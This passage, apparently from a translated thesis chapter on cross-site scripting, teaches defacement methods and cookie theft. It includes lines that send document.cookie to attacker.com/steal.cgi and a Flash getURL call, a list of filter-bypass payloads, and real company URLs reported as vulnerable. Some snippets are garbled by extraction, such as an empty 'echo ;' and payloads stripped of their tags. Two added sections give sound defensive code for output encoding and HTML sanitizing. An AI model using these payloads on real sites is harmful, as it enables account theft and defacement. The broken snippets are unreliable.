        newImg.setAttribute("border", '0');
        newImg.setAttribute("src", imageUrl);
        overLay.appendChild(newImg);
      }
      var footer = document.createElement("p");
      footer.style.font = 'italic normal normal 12px Arial';
      footer.style.color = '#DDDDDD';
      footer.innerHTML = title;
      overLay.appendChild(footer);
    }

Some simple ways to deface a website:
- Change the background colour:
    document.body.bgcolor = <any colour>;

Example: http://targetsite.com/document.body.bgcolor=red
- Change the background image:
    document.body.background = "http://your-image.jpg";

- Deface with PasteHTML
First, upload your deface page to Pastehtml and take the link. When you find a page vulnerable to XSS, enter the following script into the URL:
    window.location = "http://pastehtml.com/link_to_the_deface_page_you_uploaded";

This script redirects to the deface page you uploaded.
- Deface with an iframe
Inside an iframe tag, a hacker can inject malware into a website through XSS. If a user then visits the website, they are redirected to the page hosting the malware and their computer becomes infected. First, the attacker finds a web page vulnerable to XSS, then checks whether an iframe tag can be inserted. If that succeeds, the attacker inserts the following script into the URL:

For websites written in PHP:
    echo ;

3. Exploiting XSS attacks
a. The traditional XSS attack:
Web applications often store important information in cookies. A cookie is a piece of information that the application stores on the user's hard disk, and only the application that set a cookie can read it. The hacker therefore only has a chance to steal the cookie while the user is in a session with the application. After finding a flaw in the application, the hacker's first task is to find the page that invites the user to log in.

Figure 2.10 The XSS attack process
Summary of the steps:
Step 1: The hacker learns that the user is using a web application with an XSS vulnerability.
Step 2: The user receives a link through email or on the website itself (in a guestbook or banner it is easy to add a link created by the hacker). The hacker usually lures the user with messages that arouse curiosity, such as "Check your account", "An attractive prize is waiting for you", and so on.
Step 3: The information (cookie, username, password) is transferred to the hacker's server.
Step 4: The hacker creates a CGI program (for example steal.cgi) or a web page that records the stolen information into a file.
Step 5: After receiving the necessary information, the hacker can use it to break into the user's account.
Example: exploiting a vulnerability in the hotwired.lycos.com application, the hacker could proceed as follows:
Look at this! An attractive prize is waiting for you

After the user clicks the link "An attractive prize is waiting for you", the cookie on the victim's machine is stolen and passed as a parameter to the hacker's steal.cgi program:
    http://www.attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C20100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_titan_20=5901=1019511286
The problem is that the programmer may protect the web application by filtering special characters such as ', <, > or + (which can also prevent the use of ' to run SQL queries). But the hacker can use hex codes instead of the special characters to attack, replacing ASCII characters with their hex values.
Example: http://www.attacker.com/steal.cgi
    h -> 0x0068
    t -> 0x0074
    t -> 0x0074
    p -> 0x0070
    : -> 0x003A
    / -> 0x002F
Some websites where XSS vulnerabilities have been found (Company | Domain | Exploited link):

    NBC | http://www.shopnbc.com | http://www.shopnbc.com/listing.asp?qu= alert(document.cookie)&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1

    Microsoft | http://www.microsoft.com | http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target=alert(document.cookie)

    Chase | http://www.chase.com | https://www.chase.com/chase/gx.cgi/FTcs?pagename=alert(document.cookie)&urlname=smallbusiness/direc

    Ebay | http://scgi.ebay.co.uk/ | https://scgi.ebay.co.uk/sawcgi/eBayISAPI.dll?SSLRegisterShow&countryid=3&siteId=3&co_partnerId=0&UsingSSL=1&aolemail=alert(document.cookie)

    Oracle Japan | http://www.oracle.co.jp/ | http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=alert(document.cookie)

Table 2.1 List of XSS vulnerabilities discovered on the websites of some large companies.

b. Bypass techniques and attack method:
Some sites are vulnerable to XSS but cannot be attacked with simple code; the solution is to bypass the filter. Some bypass forms of the script are as follows:
    alert("Check By Soleil")
    alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
    alert("Check By Soleil ")
    alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
    alert("Check By Soleil ")
    alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
    ">">alert("Check By Soleil ")
    ">'>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
    ">'>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99))
    ";alert("Check By Soleil ");"
    ";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"
    ';alert("Check By Soleil ");'
    ';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'
    ";alert("Check By Soleil ")
    ";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
    ';alert("Check By Soleil ")
    ';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))

Here 67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108 are the character codes of the string "Check By Soleil".
Example: an attacker can enter the following bypass code into the search box of the site http://eclectasy.com:
    alert(XSS)

From this it is determined that the site is vulnerable to XSS, and the next step is to look for a way to exploit it and take control of the site.
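The bypass list above and the hex-encoding trick described under the traditional attack defeat the same kind of defence: a filter that looks for particular characters in the input. What holds up is encoding on output, according to the context the value lands in. The following is an added example written for this section, not code from the thesis; encodeForHtml, encodeForJsString, quoteStrippingFilter, renderSearchPage and the sample payload list are all constructed here, and the sample payloads carry the <script> tags in full, which the extracted list above has lost.

```javascript
// Added example, not from the thesis: context-aware output encoding versus the
// character blocklist that the bypass payloads above are built to evade.

// HTML body and attribute context: every character that could change the
// parser state becomes an entity, so "><script> or '> stays literal text.
function encodeForHtml(s) {
  var map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
              '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, function (c) { return map[c]; });
}

// JavaScript string-literal context (the ";alert(...);" family): everything
// outside [A-Za-z0-9] is written as \xHH or \uHHHH, so neither quote can close
// the literal and "</script>" cannot close the surrounding tag.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, function (c) {
    var code = c.charCodeAt(0);
    return code < 256
      ? '\\x' + ('0' + code.toString(16)).slice(-2)
      : '\\u' + ('000' + code.toString(16)).slice(-4);
  });
}

// The weak defence the thesis describes: strip a few "special" characters on
// input. It does nothing against a payload that simply avoids them.
function quoteStrippingFilter(s) {
  return String(s).replace(/['"+]/g, '');
}

// A page that reflects the search term twice, as the sites in Table 2.1 do:
// once in the HTML body and once inside an inline script.
function renderSearchPage(query) {
  return '<p>Results for: ' + encodeForHtml(query) + '</p>\n' +
         '<script>var q = "' + encodeForJsString(query) + '";</script>';
}

// True when, after encoding, the input can neither start a tag in the body
// nor leave the string literal inside the script.
function outputsAreInert(query) {
  var html = encodeForHtml(query);
  var js = encodeForJsString(query);
  return !/[<>"']/.test(html) &&
         /^([A-Za-z0-9]|\\x[0-9a-f]{2}|\\u[0-9a-f]{4})*$/.test(js);
}

// Constructed sample: payloads from the bypass list above, with the <script>
// tags that the extracted text dropped written out in full.
var BYPASS_PAYLOADS = [
  '<script>alert("Check By Soleil")</script>',
  '<script>alert(String.fromCharCode(67,104,101,99,107))</script>',
  '"><script>alert(1)</script>',
  "'><script>alert(1)</script>",
  '";alert("Check By Soleil");"',
  "';alert(String.fromCharCode(67));'",
  '</script><script>alert(1)</script>'
];

// The fromCharCode payload contains no quotes, so the quote-stripping filter
// passes it through unchanged.
function quoteFilterLetsFromCharCodeThrough() {
  var p = BYPASS_PAYLOADS[1];
  return quoteStrippingFilter(p) === p;
}

// Every payload in the list is harmless once encoded for its output context.
function allPayloadsInert() {
  return BYPASS_PAYLOADS.every(outputsAreInert);
}
```

The two encoders are deliberately separate: the entity form that is safe in an HTML text node is not enough inside a script block, where the attacker's quote and "</script>" are the dangerous characters, and this is exactly why a single input filter keeps being bypassed.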

Figure 2.11 A page vulnerable to XSS

c. Attacks using Flash:
Besides injecting dangerous code directly, a hacker can also use flash files to steal information. Macromedia Flash can be programmed with a built-in scripting language, ActionScript, whose syntax is simple and similar to JavaScript, C or Perl. For example, the function getURL() calls another web page; its parameter is normally a URL such as http://www.yahoo.com.
Example:
    getURL("http://www.yahoo.com")
However, the URL can be replaced with JavaScript:
    getURL("javascript:alert(document.cookie)")
The example above displays a dialog containing the cookie of the web page that hosts the flash file. In other words, the web page is attacked by injecting JavaScript into the web application through a flash file. A clearer example of this attack is:
    getURL("javascript:location('http://www.attacker.com?newcookie=' + document.cookie)")
This is a command inside the flash file and it runs when the flash file is loaded. So when a user views the web page containing this flash file, the cookie created by that page is immediately sent to the hacker.
Example: DeviantArt is a well-known website that lets its members upload flash files for all members to view. A hacker can therefore steal members' cookies, possibly including the web administrator's account, by registering as a member of this web application, uploading a flash file to the server and waiting for victims to view it. Below is a link to a flash file of the kind presented in the example above:
    http://www.deviantart.com/deviantion/1386080
Websites that let members submit data in HTML form, such as forums and custom signature features, can also be targets of this attack, by entering code that calls the flash file.
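Several passages in this section depend on a site accepting markup or embedded objects from its members: the iframe defacement, the Flash upload on DeviantArt, and the forum posts and signatures just mentioned. Where a site must accept HTML, the workable defence is an allowlist sanitizer that keeps a few harmless tags and drops everything else, including iframe, object and embed, every event-handler attribute, and any javascript: URL. The following is an added example, not code from the thesis; sanitizeHtml, its allowlists and the sample inputs are constructed here.

```javascript
// Added example, not from the thesis: an allowlist sanitizer for HTML that
// members are permitted to submit (forum posts, signatures). Anything not
// explicitly allowed is dropped, instead of trying to enumerate what is bad.

var ALLOWED_TAGS = { b: true, i: true, u: true, p: true, br: true, a: true, img: true };
var ALLOWED_ATTRS = { a: ['href'], img: ['src', 'alt'] };
// Elements whose whole content is discarded together with the tag itself.
var DROP_CONTENT = { script: true, style: true, iframe: true, object: true };

// Only http(s) URLs are accepted, so javascript: and data: never reach href/src.
// Whitespace and control characters are removed first, since browsers ignore them.
function safeUrl(value) {
  var v = value.replace(/[\s\u0000-\u001f]/g, '').toLowerCase();
  return v.indexOf('http:') === 0 || v.indexOf('https:') === 0;
}

// Text nodes: a stray < or > becomes an entity; existing entities are kept.
function escapeText(s) {
  return s.replace(/&(?![a-zA-Z#][a-zA-Z0-9]*;)/g, '&amp;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function sanitizeHtml(input) {
  var out = '';
  var skipUntil = null;                 // closing tag we are waiting for
  var tokens = input.split(/(<[^>]*>)/); // alternates text, tag, text, tag, ...
  for (var i = 0; i < tokens.length; i++) {
    var tok = tokens[i];
    var m = /^<\s*(\/?)\s*([a-zA-Z][a-zA-Z0-9]*)([^>]*)>$/.exec(tok);
    if (!m) {                           // text, or a fragment that is not a tag
      if (skipUntil === null) out += escapeText(tok);
      continue;
    }
    var closing = m[1] === '/', name = m[2].toLowerCase(), rest = m[3];
    if (skipUntil !== null) {           // inside <script>, <iframe>, <object>...
      if (closing && name === skipUntil) skipUntil = null;
      continue;
    }
    if (DROP_CONTENT[name]) { if (!closing) skipUntil = name; continue; }
    if (!ALLOWED_TAGS[name]) continue;  // unknown or void tag (embed): drop tag only
    if (closing) { out += '</' + name + '>'; continue; }
    var attrs = '';
    var attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g, a;
    while ((a = attrRe.exec(rest)) !== null) {
      var an = a[1].toLowerCase();
      var av = a[2] !== undefined ? a[2] : (a[3] !== undefined ? a[3] : a[4]);
      if ((ALLOWED_ATTRS[name] || []).indexOf(an) === -1) continue; // drops on*, style, ...
      if ((an === 'href' || an === 'src') && !safeUrl(av)) continue;
      attrs += ' ' + an + '="' + av.replace(/&/g, '&amp;').replace(/"/g, '&quot;') + '"';
    }
    out += '<' + name + attrs + '>';
  }
  return out;
}
```

A regex tokenizer like this is fine for showing the allowlist principle, but a production site should hand the job to a parser-based sanitizer such as DOMPurify, because real HTML parsers accept many malformed inputs that a hand-written tokenizer will not see the same way.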